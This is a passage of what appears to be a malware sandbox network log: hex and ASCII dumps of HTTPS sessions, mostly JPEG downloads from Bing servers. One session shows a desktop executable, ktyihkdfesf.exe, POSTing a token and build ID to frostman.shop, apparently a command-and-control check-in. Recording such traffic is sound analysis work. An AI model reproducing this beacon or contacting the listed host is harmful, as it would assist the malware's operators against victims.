                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 21 46 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 30 3a 34 38 3a 33 37 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``!FExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 10:48:378
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 5a 9b 46 5d 19 f1 07 8d 7c 35 a2 fd ae 4d 2f 48 9a ee de 0f 2e da 48 fe d3 bf 64 6f 2a 7e f3 e5 ae cf e1 0f c3 9f 12 59 69 b7 ba f6 a7 79 a4 db e9 7f 62 78 23 fb 37 ce f2 6e ff 00 f6 6b d9 bc 5d a1 e8 5f 16 26 93 44 b5 87 cb ff 00 84 66 3f b5 d9 47 2f c8 f2 23 3f ce cc d5 06 a5 e0 cf 12 f8 72 d3 c8 83 47 9a f7 4a bd 8b ec fe 5c 5f 24 3f 37 fb bf dd af 52 38 a9 cd 2a 62 71 72 d8 f9 43 c3 3e 07 d5 bf b5 a4 bb f2 bf 73 a5 6c 90 f9 72 ec f9 77 fd dd df f3 d3 fd 9a 66 ab 3c 76 93 6a de 1e 82 1f 2e 4f b6 bf ef 3f dd fe 1a fa b3 c5 5e 00 d1 62 fb 4f db 6c f5 0b 88 24 b6 f3 23 8e db e4 ff 00 48 5f 95 59 1b ee b5 78 7f c5 af 85 30 69 32 db 6b de 1a bc d4 35 1f 2f f7 f7 3f 6e 87 67 fb df 37 f1 35 7a 34 ea 4e 4b de 0b 1e 45 e2 88 a4 7b a8 e1 fb 24 91 f9 5f b8 8f 67
                                                                                                                                                                                                                                                                                                Data Ascii: ZF]|5M/H.Hdo*~Yiybx#7nk]_&Df?G/#?rGJ\_$?7R8*bqrC>slrwf<vj.O?^bOl$#H_Yx0i2k5/?ng75z4NKE{$_g
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: f6 88 1f 33 7f b3 58 d4 c5 53 a7 a5 ee fc 89 94 e2 8f 0f f8 7f f0 fb c5 5e 32 b6 b8 ba d0 ec b7 db da 1d 92 cf 24 9b 14 1f ee e6 b6 34 1f 86 ba 8d 8d d5 b5 ef 89 84 36 f6 be 7b 8f b3 79 9b a5 9b 67 5f bb d0 7b d7 a3 7c 48 f1 17 86 3c 1b a3 5c e9 9e 0e d3 a6 d3 ed 4c 7e 5c 91 99 bf e3 e1 9b f8 ff 00 bf 5e 7f 1f 8b f4 9d 4e ee 3f b6 c3 34 70 47 6c 96 fe 5f fe 84 d4 53 9d 4a 8b 9e d6 4f 61 c5 b7 a9 af 6b e2 2d 0b c4 1f 14 b4 d8 6e ac fe c5 63 6d fb b9 24 8a 6f ee ff 00 e3 ab 8e d5 f4 25 8f 88 f5 69 ad 24 d1 3c 21 67 a8 5b c7 1c 7f 67 8f ec df e9 3f 64 46 ff 00 a6 8f fe 7d eb c3 3c 03 f0 92 ff 00 c7 1e 1e be f1 3e 91 77 f6 24 f9 e3 8f f7 3f 26 d5 fe e7 f7 53 fd aa fa 13 e0 ef c2 db 4d 0b 49 b6 93 4e d7 b5 09 27 8e c9 fe db 6d 73 bf ec df 37 fb 5e f5 e7 e3 3d
                                                                                                                                                                                                                                                                                                Data Ascii: 3XS^2$46{yg_{|H<\L~\^N?4pGl_SJOak-ncm$o%i$<!g[g?dF}<>w$?&SMIN'ms7^=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: bd 5e e7 f0 92 d2 fe 2d 0e 4d 45 34 d9 a4 8e 38 fc b9 23 97 fd 74 9b bf 8e 36 5f eb 5c b5 e3 ee 6a 4b 3a 8f 17 6a f1 c5 e5 e9 da 8d e7 da 23 92 4f b3 f9 71 7d f8 e2 ff 00 77 fb cb 4f 92 7d 16 e3 50 b1 7f 3a 1b 7d 4b ec cf 6f e5 cb f2 3c 9f f3 cf e6 fe 1a b9 6b 73 77 7b 69 1e 9d 7b 0d a7 99 6f 1f 99 1f 9b 16 ff 00 f7 6b 06 fb 4a ff 00 89 4c 77 49 67 0d bb f9 9f 67 ff 00 4e fe ff 00 f7 55 ba d7 97 37 d0 11 d5 78 2e e7 ec fe 26 8d ee b4 db 4f ed 5d 3b 65 c5 b7 da 76 7f f6 41 eb a8 9f e2 27 87 a2 bb b9 83 c5 77 9f d9 d2 6a 3f bc 8e 3b 19 51 21 f3 77 fd dd bf 77 61 fe f0 af 32 91 a4 b4 f1 65 b5 aa 4d 35 be a5 fe b3 cb ff 00 96 31 a5 4f e3 8b 6b 4b dd 26 37 d4 6c fe d1 3c 9f e9 1f 66 8a 1d 93 7c bf dd db fc 55 c7 5a 0a a3 e4 93 d0 a5 27 16 7b 74 fa d7 86 b5 8d
                                                                                                                                                                                                                                                                                                Data Ascii: ^-ME48#t6_\jK:j#Oq}wO}P:}Ko<ksw{i{okJLwIggNU7x.&O];evA'wj?;Q!wwa2eM51OkK&7l<f|UZ'{t
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ea de 1f bb b9 d4 6e bf d1 e7 fb 6a 79 72 45 69 ff 00 2e ff 00 f4 db b7 de a8 bc a3 ee 12 75 b7 1a d4 9f 6b b1 df 37 99 63 7b b2 38 ef 62 89 d2 1d ed f7 3e 5e 7a 55 3f 8c d6 d6 16 b7 71 ea f3 eb 10 c7 1c 71 a4 97 3e 6c 5f b9 bb f9 36 6d f4 dc 7b 56 47 80 f5 3b fd 4f 49 be 77 9a 19 34 3b db 6f 2f cc 92 54 ff 00 44 ba 6f b9 b1 7f 93 54 be 23 d3 3c 51 ff 00 0a cb 52 f0 9e af af 43 71 fd a3 ff 00 2d 25 d9 fb c4 5f b9 f2 a7 fb b5 bd 2a 90 83 b4 dd 80 97 c1 da e7 86 b4 ff 00 09 dc cf 75 ac 5d d9 49 1d cf ee ef 74 d8 93 7d bc 5f f3 cf 6b fd ff 00 f6 eb 52 4b 6f 0b dd c3 73 fd 83 35 a7 97 a7 47 f6 7d 4a ca e6 5f df 79 51 6c 91 d5 df f8 1b ee 73 5e 69 a6 f8 73 5d d3 2e e4 4d 12 cf fb 6b 4a 92 3f b4 7d 9a fa 2d e9 bf fe 5a bc 6b fd e1 fe d5 61 f8 7f c1 3a 97 8a f5
                                                                                                                                                                                                                                                                                                Data Ascii: njyrEi.uk7c{8b>^zU?qq>l_6m{VG;OIw4;o/TDoT#<QRCq-%_*u]It}_kRKos5G}J_yQls^is].MkJ?}-Zka:
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 6a 33 5e 4b fe 8f ff 00 2c ab 02 69 5e 6b 7d 93 4b fe af a7 ee eb a3 d2 db 54 9b 4b 93 4e b8 d4 6d 74 fb 48 e4 f3 24 7b 83 8f fb e1 7a b5 31 97 4e 6f b3 e2 cf f7 9e 52 66 4b 99 7f d6 37 fb 31 d6 87 74 26 d2 30 24 86 d9 6c 4b 98 ae 92 62 7e 4c c7 f2 1a b3 a0 dd d9 43 35 bf da 04 df bb 93 3f bb ad 9d 4e 1d 37 54 9b fd 2b 58 bb b3 48 c2 7f ac 8b ce 87 ff 00 1c c6 df ca b0 75 8d 35 ac ae 24 48 ee ed af 21 8c ec 17 16 f2 65 0d 06 d1 69 a2 bd f3 a7 f6 ac 93 27 fa bf 32 ae f8 7b c8 6d 5b ed 33 c3 e6 47 f3 c9 e5 f9 bb 2b 2a 35 ae 9b c3 be 19 d4 ae 7c a4 b5 bb 11 bd e0 ff 00 c7 6a 65 25 15 76 12 69 23 53 4f bb f0 dd b5 ac 7a 92 69 12 cb 1c f2 f9 72 47 e7 7e f6 b3 75 1d 3b 47 4b a9 6e a0 9b cb 82 df fe 5d e4 9b e7 dd fe cf d2 b7 b4 7f 87 5e 2c 8b 56 8f ec b6 42 f3
                                                                                                                                                                                                                                                                                                Data Ascii: j3^K,i^k}KTKNmtH${z1NoRfK71t&0$lKb~LC5?N7T+XHu5$H!ei'2{m[3G+*5|je%vi#SOzirG~u;GKn]^,VB
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 86 bc 39 0d f6 9d a7 4d 77 a8 df 59 48 92 7f 69 7d 93 67 99 b9 37 37 de f9 7e 55 fe 1a 8e 4f 14 5a 69 f3 47 3d ee a5 f6 7f 0e 6a 37 33 47 6d 24 5f f1 f9 71 17 f1 b7 96 bb be 57 ff 00 26 a4 f0 05 8f 95 ab 5f 5d 59 7f 67 db e9 b2 46 f6 97 32 4b 2f fa 4c 72 af de 64 df ba 36 ac 9f 17 78 26 d3 47 f1 bc 7f d9 7a 96 9f a8 e8 f1 dc f9 96 5a 6d 8d db cc f2 24 9f 33 7f 0f cb fe e6 ea cd 35 72 42 4f 1e ea 56 5f 10 ad b4 bf 08 4d 0e ab 6b aa c6 92 47 6d f3 dc fc 9f c2 aa 9f df 4f ef 57 61 aa dc ea 5a 3f ee 34 4b 39 a3 fb 3d 94 d7 77 31 cb 17 9c 96 f2 fd f5 d8 ad fc 4d f7 ba 7c 95 e0 9a 56 af 7f ac 6a d1 da da c3 a4 d9 4f a7 48 f3 fd a7 e4 b6 b9 8e 28 df e7 f9 ff 00 f4 1f e2 af 4b d5 7e 26 f8 96 f6 d2 ca cb c3 53 6a 12 4f e6 7e f2 3b 6f 9e 6b b4 df b7 74 9b be fb 05
                                                                                                                                                                                                                                                                                                Data Ascii: 9MwYHi}g77~UOZiG=j73Gm$_qW&_]YgF2K/Lrd6x&GzZm$35rBOV_MkGmOWaZ?4K9=w1M|VjOH(K~&SjO~;okt
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16067INData Raw: 63 32 e5 75 52 2e cd 19 4b 56 4c b6 7e 36 d1 fe 36 e8 9a 67 8c 6d 26 bd 92 ce 4f dd dc 5b 4b e4 fd be 05 fb b2 f9 9d 37 fc 9f 75 ea bf ed 0b a5 58 69 9e 37 b6 9e f7 5e bb 92 c7 51 8d ee fe cd 1d a6 c9 b6 37 f7 7f ad 75 96 bf 10 74 6f 10 69 3f 65 d5 3c 2b 35 c7 f6 35 ca 7f a4 c5 fe 8d 34 72 c8 ff 00 2b fc bf 25 70 9f 1d bc 6f 21 f1 0d 97 85 2e a7 1a ae 9b 14 69 e6 c7 1f ee 7e f3 bf c9 2f f7 5d 29 60 e7 5e 58 84 9c 6d a6 a5 53 93 4f 43 83 d4 62 b1 7d 42 3b 5b 1d 76 6f 2f cc 78 3c df b5 6c 4f ef ef aa 1a 8b 5b ff 00 c2 4b 67 6b 04 3f 6c b5 fb 91 c7 6d 17 fa c6 fe f7 fb 75 36 8f ad 36 9f 7d 7b 1d cc b1 c7 a7 c9 bf fd 1f ca ff 00 96 aa 9e 5a b5 62 df 6a 09 3d d4 77 36 c3 cb be f3 5e 4f 32 3f e3 dd 5e f2 89 a1 d8 47 2c 16 fe 20 8f cf d5 fe da f6 52 43 1f d9 a5
                                                                                                                                                                                                                                                                                                Data Ascii: c2uR.KVL~66gm&O[K7uXi7^Q7utoi?e<+554r+%po!.i~/])`^XmSOCb}B;[vo/x<lO[Kgk?lmu66}{Zbj=w6^O2?^G, RC
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: 6b fe cf f7 ab 97 30 ad 47 0c dd 3f b4 57 29 06 87 e1 5d 6a f7 c1 d7 c9 e2 4f 26 f6 fa e3 7f da 7f 7b e7 24 6f ff 00 4c 7f c7 6d 73 89 e2 8d 5a d3 43 92 0b df 3b 51 92 4f dd fd b6 db 4f 7f dd f9 7f 75 be 6f 9a bd 0e 7f 32 ca 18 d2 ca f2 68 fc bf f5 9e 6f fc b3 da 9f ed 57 1f e2 af 1b 69 b7 13 5b 69 10 79 da 8d f5 97 ef 3c df 29 fc 9b 77 ff 00 be 7e 6d d5 e4 4b 12 ab 75 34 89 e4 3e 2a f1 34 17 5e 26 f0 dd d6 bd e2 af 32 eb 4a b9 9a 7f 2f ca f2 5f ed 0a 9f b9 7f e2 db 5d e5 f7 8a b5 6b 8f 86 77 da 85 ee bd e5 fd a2 e5 23 fb 6d f6 c7 b7 f9 be f7 f0 6d af 39 db a4 ea 1f 1a 23 bd ba 9b fb 2a 7b 7b 6f 32 4f dd 7e fa 49 59 fe ee dd 85 53 fe f8 ae f3 43 8f c2 1a af 87 ff 00 e2 67 0d a5 e7 97 23 f9 56 5a 94 5e 4f 9f fe ec 7b 55 2b b7 19 08 43 d9 5d 36 95 bf 52 8f
                                                                                                                                                                                                                                                                                                Data Ascii: k0G?W)]jO&{$oLmsZC;QOOuo2hoWi[iy<)w~mKu4>*4^&2J/_]kw#mm9#*{{o2O~IYSCg#VZ^O{U+C]6R
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: d7 c3 70 c9 63 25 ea 7f a4 db 4b b1 3e e7 f1 7d d6 4a bb e1 f8 34 9b 2f 1b df 43 a8 e9 b7 72 68 7a ae f8 ec a4 92 2f dc c7 2c 9f c3 bf fe 5a 2a 7b d7 9b 2c 53 86 b1 93 d0 0e 47 c3 3e 05 93 58 d3 fe db a5 de 45 25 f4 71 fe f2 da db e7 9b cd fb bf 3f ca 36 56 65 f7 c2 4d 6a 5f 10 47 75 aa 6a 5a 87 97 1c 89 6f e6 45 ff 00 7c fd e4 5a f5 cd 61 3f b1 ee e4 ba d2 3e c9 e6 5b db 24 72 5c c5 69 0d b7 cf f7 3f ed a7 cb d2 a0 f1 04 f2 5c 69 f1 ce 93 7f c7 c4 9f e9 b6 d2 dd a2 7f c0 d3 76 df be bf c3 b6 b0 58 bc 44 b5 8b d0 a7 36 73 3f 0d be 1a 6b 56 ff 00 6e d3 9e 6f ed 1d 3a f6 4f dd f9 b1 23 ff 00 df 7b fe 5d d5 a5 e2 7d 2a 4b 28 63 83 fb 07 4f 8e 08 e4 f2 e4 b2 8a ed ff 00 77 fc 3f 22 36 ef d3 e5 ac ff 00 18 ea 7a b5 c6 a1 1e 96 97 97 76 53 c9 1a 49 65 2c bb 21
                                                                                                                                                                                                                                                                                                Data Ascii: pc%K>}J4/Crhz/,Z*{,SG>XE%q?6VeMj_GujZoE|Za?>[$r\i?\ivXD6s?kVno:O#{]}*K(cOw?"6zvSIe,!


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                19192.168.2.649753116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1DBAI5X4OZU3EUASRQ16
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------1DBAI5X4OZU3EUASRQ16Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:17 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                20192.168.2.649758150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC346OUTGET /th?id=OADD2.10239381795372_1FAN52Y1AD18QPYNG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 755702
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 671A6C4B9033487ABE72C4F63DE7B0B6 Ref B: EWR311000107039 Ref C: 2024-12-20T06:31:18Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:17 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1e 62 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 30 3a 34 39 3a 35 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``bExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 10:49:548
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC16384INData Raw: b5 7e d1 fb bf b3 4b 17 c9 bf fd a6 a9 f5 2f 0a f8 96 e2 ee e7 4e d7 a6 b4 b2 93 4a b6 ff 00 97 68 91 e1 b8 8b fb 91 d7 9f 36 bd a3 52 df b0 ce 02 3f 14 6a 5a 84 d6 53 e9 d3 7d a2 38 e4 48 e3 b6 fb ef f7 2b dd 3c 1d 14 fa 87 87 ac 77 cd 0e 95 27 c9 71 e6 4b bd ff 00 83 ef 7f bd 5e 37 e2 0b 18 34 7f 10 f8 6e d7 fb 37 56 f3 ee 22 7b 8b 6b 2b 68 91 fc cd ce ff 00 33 57 73 75 ab da 68 9f b8 4f 18 5d dc 5f 47 22 7d a6 cb ca 47 4b 76 6f ef cb 58 66 14 1d 58 43 93 4e a4 35 61 9e 34 d6 af f4 2d 5a 49 df fd 22 d6 ca d9 e4 ff 00 c7 fe f7 f8 2d 74 9f 0f 7c 5f ad 5c 6a 11 ea 3a 5e b1 0d 94 97 11 fd a2 4b 6f 35 f7 fc d5 e6 7a c6 b9 61 a8 78 7a f9 fc 99 bc b8 e4 4f b3 49 ff 00 3f 1f 3f df 7a dc f0 e6 87 1d dc d7 da 25 95 e5 a6 9d 3f 97 fb cd 4a 58 9d 12 34 d9 bd b7 7f
                                                                                                                                                                                                                                                                                                Data Ascii: ~K/NJh6R?jZS}8H+<w'qK^74n7V"{k+h3WsuhO]_G"}GKvoXfXCN5a4-ZI"-t|_\j:^Ko5zaxzOI??z%?JX4
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC16384INData Raw: b3 69 b2 87 85 7e 1e 5d cb 77 7d 3f 89 21 bb b8 83 4a ff 00 96 7f c1 f2 bf f0 ff 00 7a b0 be 1d df 5a 68 57 5a b3 c1 a3 cb 79 24 77 9f bb 8e 4f f5 3e 57 f7 5a bb 6b af 16 6a de 1c d4 23 b1 fb 1d de 95 a9 79 93 47 24 7a 96 f7 b6 8d 77 fc ae bf df 65 fe f5 70 5e 1e be 5d 2b fb 7a d6 5d 4a d7 cf 92 e3 e4 8c c4 fb 2e 0f fb df c1 5d d0 72 94 5f 36 c2 3a cd 0f 4c fe dd b4 df a5 d9 e9 f6 52 49 27 97 e5 4b 2e ca 64 9e 15 d6 74 7f b7 7d b7 5e 8a e2 7b 78 de 4b 6b 6b 19 6b 1b c0 1a bd df 87 35 c9 35 1d 47 4d 87 51 83 fe 79 f9 bb fc bf f6 d6 ba 3d 63 fb 26 fb 49 ff 00 84 a3 44 9a 6f ed 29 3f 77 1d 97 95 fd df ee ff 00 b5 59 cb 49 58 92 d7 81 fe 27 c1 65 e0 9b 98 f5 4b 3b bb 88 e4 97 cb fb 37 9d e7 7d af fa d5 3f 10 6b 3e 0c 16 96 de 2b f8 7b 0c d6 57 51 fe e2 e2 ca
                                                                                                                                                                                                                                                                                                Data Ascii: i~]w}?!JzZhWZy$wO>WZkj#yG$zwep^]+z]J.]r_6:LRI'K.dt}^{xKkkk55GMQy=c&IDo)?wYIX'eK;7}?k>+{WQ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC16384INData Raw: 7e 1c f0 f5 ce b7 f6 c8 6e 2f a4 91 3e db 24 5b 1f cb ff 00 ae 49 fd c3 5e 69 fb 42 ea be 1a b8 87 4d d7 bc 29 67 f6 78 f5 1b 2f f4 df 2b e4 86 4f 9f fb bf de af 7f 07 88 ad 39 28 4a 2f 97 64 ca 39 cd 57 e1 a5 dc 5a 7c 7a f7 89 7c e8 fe d1 72 f6 f1 f9 5f ea 7e 5f ee b5 4b 27 8a a4 fd df 91 fb cf b3 c9 e5 ff 00 aa f9 3e 5f 92 a8 41 e2 3b 84 f0 9c 7a 5b cd 34 92 7f ac 8e 39 7f e5 9d 1a 6c b1 ff 00 61 dc da a5 9c 31 c7 71 22 79 72 7f bb 5d cf 9b a8 1d 6e 87 ab dd c5 e1 ed 5b 51 bd 9b cc f2 f6 47 1c 7f 7f fd 67 cb f2 57 11 e0 f8 24 7f 32 f6 79 bc bf 2e e7 cc 92 3f f9 e8 8c f5 a3 7d 2d dd 96 9f 73 64 f3 7e e2 49 13 f7 9f f3 d1 d6 b7 b4 3b 6d 36 5f 0f 58 cf 3c 31 7d ba e2 47 92 39 2b 17 ee a2 4e e2 eb c4 33 a7 c1 cf 23 44 f2 63 9e e2 f7 cb ff 00 6f ca 5a d6 d3
                                                                                                                                                                                                                                                                                                Data Ascii: ~n/>$[I^iBM)gx/+O9(J/d9WZ|z|r_~_K'>_A;z[49la1q"yr]n[QGgW$2y.?}-sd~I;m6_X<1}G9+N3#DcoZ
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC16384INData Raw: 7d 95 e8 7f 0f 75 3b 0d 63 43 df af 79 37 10 59 49 34 91 dc cb 17 c9 b3 fb 9f ee d7 21 e1 9f 1e e9 3e 1c f0 f4 7a 76 af a6 c3 e7 db ff 00 a3 c9 25 cc 5b fc c4 fe 16 fc 6b a2 d2 ae 7c 3d 7b a1 dc dd 5a d9 f9 9e 5c 89 27 97 e6 bf 93 fe f7 fb be b5 8d 48 36 89 89 db f8 b7 ec 29 a2 5b be 91 0c be 5c 9b e4 b8 8e 29 7f 73 fe cf 97 ff 00 01 ac 2f 0f f8 73 c3 57 7e 1e d6 fe db 67 69 1c f7 b1 f9 71 5e cb fe ba 3f 93 ff 00 42 ae 1f 4d f1 2d 85 df f6 6a 6a 9e 4d 95 8e ab 24 d6 f2 5c f9 bb 1e dd e3 f9 53 67 d6 b1 20 f1 ef 88 74 af 13 78 81 2f 66 bb b8 8e de 44 8f ed 36 31 6f 86 dd 1b fd 5b c8 dd 39 5a e5 ad 78 ea 6b 1d cc 4f 15 7c 03 d0 b4 ff 00 df a6 b1 77 1f 99 fb bb 99 25 f9 fe f7 fe 83 5f 33 fe d1 de 08 7d 07 54 d3 b5 7b 19 fe d9 a7 ea 5e 75 bd b4 7f f2 da 09 60
                                                                                                                                                                                                                                                                                                Data Ascii: }u;cCy7YI4!>zv%[k|={Z\'H6)[\)s/sW~giq^?BM-jjM$\Sg tx/fD61o[9ZxkO|w%_3}T{^u`
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:18 UTC16384INData Raw: d4 3c 33 1e af f6 cb bb 8d 72 e2 34 92 4b 9f 91 21 f9 be fa 22 2d 79 64 6d 27 9d f3 d6 51 8b 7d 48 e5 3b 0b ad 42 4f 3a c7 48 b5 f2 a4 93 cc 4f 32 4f f9 e9 5b da ae b9 a9 78 52 6b ef 0d e9 7f e8 f2 5e c7 f6 7b 98 e2 fe e3 7f f6 35 ce f8 27 5e 87 46 fb 6d f3 43 14 b7 66 dd e3 8a 49 62 df e5 d1 7d 63 ab 26 a1 2d d6 a9 14 df da 37 96 df 68 8f fb f5 32 8a ea 4b 89 b1 ae 69 f3 f8 5f 49 b9 82 fb ce 8f 51 b8 8f cb f2 ff 00 e7 9f fb d5 93 e0 38 2c 65 f1 34 6f 7b 34 36 f0 47 ff 00 2d 25 8b 7a 6f ff 00 76 ad 78 aa 7d 4f 58 f1 0f fc 4d ec fe cf 3c 91 c3 e5 f9 bf ee 7d ea cd f0 e6 9f 3e a7 e2 69 34 8f 3b cb 4f 9f cc 92 2f 9f ee d2 b6 8c 0e ea 7d 2b fe 12 0f 10 c7 f6 d9 a6 8e 3f 9f cc 92 da 2f f9 65 fc 5b 52 b9 cf 8a 11 68 d6 97 77 36 5a 27 ef 2d 6c a3 48 e2 93 cd df
